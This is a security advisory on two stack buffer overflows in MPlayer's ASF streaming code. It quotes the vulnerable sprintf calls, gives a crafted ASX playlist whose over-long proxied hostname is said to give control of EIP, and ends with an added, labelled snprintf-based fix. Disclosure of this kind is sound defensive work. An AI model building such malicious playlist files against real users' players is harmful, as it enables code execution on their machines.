
Mplayer Buffer Overflow



Favorite Linux Player Buffer Overflow
 

 Product:  Mplayer
 Developers:  http://www.mplayerhq.hu
 OS:    Port to All *NIX and Win32
 Remote Exploitable:  YES

The developers have been contacted and the problem has been fixed; updating your
MPlayer version is recommended.

 In the source tree there is a file called asf_streaming.c. This file has a
function named asf_http_request, and that function contains two buffer
overflows, both in its sprintf lines.
 
 
 asf_http_request {
                char str[250];          /* fixed-size stack buffer */
                ....
                ...
                ..
                /* %s is unbounded: a hostname longer than str overflows it */
                sprintf( str, "Host: %s:%d", server_url->hostname, server_url->port );
                ....
                ...
                ..
                /* same unbounded pattern, second overflow */
                sprintf( str, "Host: %s:%d", url->hostname, url->port );
                ....
                ...
                ..
 }

 
  
 At first look this may seem unexploitable (because of the MAXHOSTLEN size
restriction), but with an ASX file like the one below, where "badsite" is
listening on "badport" and answers with "\n\n", you can trigger a buffer
overflow with a fully controllable EIP.
 
 
 <asx version = "3.0">
 <title>Bad Site ASX</title>
 
 <moreinfo href = "mailto:info@xxxxxxxxxxx" />
 <logo href = "http://www.badsite.com/streaming/grupo.gif" style="ICON" />
 <banner href= "images/bannermitre.gif">
 <abstract>Bad Site live</abstract>
 <moreinfo target="_blank" href = "http://www.badsite.com/" />
 </banner>
 
 <entry>
 <title>NEWS</title>
 <AUTHOR>NEWS</AUTHOR>
 <COPYRIGHT>© All by the news</COPYRIGHT>
 <ref href =
"http_proxy://badsite:badport/http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaa"/>
 <logo href = "http://www.badsite.com/streaming/grupo.gif" style="ICON" />
 </entry>
 </asx>
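As an added example (not MPlayer's code), the hardened form of the Host header construction: a bounded snprintf whose return value is checked, so an over-long hostname taken from a crafted URL is rejected instead of being written past str. The url_t struct, STR_SIZE and the function names are assumptions for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Stand-in for MPlayer's URL structure (assumed, not the real one). */
typedef struct {
    const char *hostname;
    int port;
} url_t;

#define STR_SIZE 250   /* same size as str[250] in the advisory */

/* Vulnerable pattern from the advisory, for contrast (not called):
 *     sprintf(str, "Host: %s:%d", url->hostname, url->port);   */

/* Hardened form: snprintf writes at most 'size' bytes and returns the length
 * the full string would have had, so n >= size means the hostname did not fit.
 * Returns 0 on success, -1 when the header would not fit (abort the request). */
int build_host_header(char *str, size_t size, const url_t *url)
{
    int n;
    if (str == NULL || size == 0 || url == NULL || url->hostname == NULL)
        return -1;
    n = snprintf(str, size, "Host: %s:%d", url->hostname, url->port);
    if (n < 0 || (size_t)n >= size) {
        str[0] = '\0';  /* leave no partial header behind */
        return -1;
    }
    return 0;
}

/* Demo on constructed input: a normal hostname and an over-long "aaaa..."
 * hostname like the one in the ASX file above. Returns 0 if both behave. */
int demo(void)
{
    char str[STR_SIZE];
    char longhost[400];
    url_t ok = { "badsite", 8080 };
    url_t bad;
    memset(longhost, 'a', sizeof(longhost) - 1);
    longhost[sizeof(longhost) - 1] = '\0';
    bad.hostname = longhost;
    bad.port = 80;
    if (build_host_header(str, sizeof(str), &ok) != 0)
        return 1;   /* a short host must fit */
    if (build_host_header(str, sizeof(str), &bad) == 0)
        return 2;   /* an over-long host must be rejected, not overflowed */
    return 0;
}
```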
 


 Regards,
 
   Hernán Otero
   hernan.otero@xxxxxxx